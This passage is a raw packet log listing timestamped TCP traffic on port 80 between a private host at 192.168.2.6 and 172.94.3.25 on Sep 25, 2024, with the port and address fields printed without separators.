                                        Sep 25, 2024 18:40:31.357384920 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.357391119 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.357397079 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.357407093 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.357413054 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.357418060 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.357429028 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.357434988 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.559127092 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.559169054 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.559180975 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.559212923 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.559246063 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.559273958 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.559278011 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.559309959 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.559341908 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.559354067 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.559376001 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.559395075 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.559483051 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.559535027 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.559568882 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.559572935 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.559602022 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.559618950 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.559633970 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.559679031 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.559685946 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.559719086 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.559751987 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.559762001 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.559802055 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.559854984 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.559864998 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.559890985 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.559923887 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.559932947 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.559957027 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.559989929 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.560003042 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.560023069 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.560055971 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.560082912 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.560087919 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.560118914 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.560123920 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.560163975 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.560195923 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.560210943 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.560235977 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.560271025 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.560309887 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.560313940 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.560343981 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.560352087 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.560375929 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.560408115 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.560416937 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.560441971 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.560475111 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.560507059 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.560518026 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.560539961 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.560549974 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.560575008 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.560607910 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.560641050 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.560651064 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.560676098 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.560686111 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.560709000 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.560741901 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.560775042 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.560785055 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.560806990 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.560816050 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.560839891 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.560873032 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.560878038 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.560904026 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.560936928 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.560942888 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.560969114 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.561002016 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.561012983 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.561037064 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.561069965 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.561074018 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.561105013 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.561136961 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.561147928 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.561168909 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.561201096 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.561208010 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.561233997 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.561265945 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.561278105 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.561299086 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.561331034 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.561351061 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.561362982 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.561394930 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.561428070 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.561433077 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.561460018 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.561470032 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.561491966 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.561526060 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.561530113 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.561558008 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.561590910 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.561625004 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.561630011 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.561656952 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.561688900 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.561700106 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.561722994 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.561723948 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.566649914 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.566703081 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.566752911 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.566754103 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.566807032 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.566809893 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.566840887 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.566874027 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.566884041 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.566911936 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.566943884 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.566975117 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.566978931 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.567011118 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.567019939 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.567044020 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.567106009 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.567115068 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.567140102 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.567173004 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.567205906 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.567219019 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.567240000 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.567246914 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.567276001 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.567496061 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.717138052 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.722170115 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.722258091 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.722312927 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.722358942 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.722367048 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.722409964 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.722414970 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.722445011 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.722477913 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.722507954 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.722527981 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.722564936 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.722582102 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.722613096 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.722645044 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.722656012 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.722676039 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.722723007 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.722726107 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.722759962 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.722791910 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.722800970 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.722843885 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.722876072 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.722887039 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.722959995 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.722995043 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.722997904 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.723027945 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.723061085 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.723093987 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.723099947 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.723133087 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.723140001 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.723172903 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.723206043 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.723212004 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.723237991 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.723270893 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.723278046 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.723301888 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.723335028 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.723345995 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.723366976 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.723457098 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.723488092 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.723496914 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.723539114 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.723541021 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.723572016 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.723603010 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.723608971 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.723639965 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.723673105 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.723705053 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.723715067 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.723737955 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.723742962 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.723772049 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.723803043 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.723848104 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.723869085 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.723907948 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.723921061 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.723953009 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.723985910 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.723993063 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.724035978 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.724069118 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.724101067 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.724108934 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.724133015 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.724138021 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.724164963 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.724215031 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.724247932 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.724255085 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.724287033 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.724298954 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.724329948 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.724366903 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.724399090 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.724406958 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.724433899 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.724438906 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.724466085 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.724500895 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.724503994 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.724533081 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.724567890 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.724581957 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.724617958 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.724649906 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.724658012 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.724682093 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.724714041 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.724755049 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.724762917 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.724797010 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.724816084 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.724828959 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.724864960 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.724894047 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.724898100 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.724931955 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.724942923 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.724963903 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.724994898 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.725008011 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.725028038 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.725079060 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.725080013 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.725110054 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.725142956 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.725173950 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.725186110 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.725214958 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.725218058 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.725250959 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.725282907 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.725315094 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.725325108 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.725348949 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.725352049 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.725382090 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.725419998 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.936722994 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.936747074 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.936763048 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.936764956 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.936780930 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.936800957 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.936810017 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.936825991 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.936841965 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.936847925 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.936866045 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.936882973 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.936894894 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.936906099 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.936922073 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.936923027 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.936939001 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.936954975 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.936969042 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.936973095 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.936989069 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.936995029 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.937006950 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.937026978 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.937042952 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.937047005 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.937064886 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.937078953 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.937107086 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.937124968 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.937141895 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.937158108 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.937175035 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.937184095 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.937216997 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.937268019 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.937284946 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.937302113 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.937319040 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.937325001 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.937335968 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.937352896 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.937355995 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.937370062 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.937386990 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.937390089 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.937414885 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.937432051 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.937448025 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.937449932 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.937469006 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.937473059 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.937489033 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.937505960 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.937514067 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.937522888 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.937558889 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.937781096 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.937798023 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.937824011 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.937836885 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.937839985 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.937856913 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.937863111 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.937875032 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.937891960 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.937892914 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.937928915 CEST4971680192.168.2.6172.94.3.25
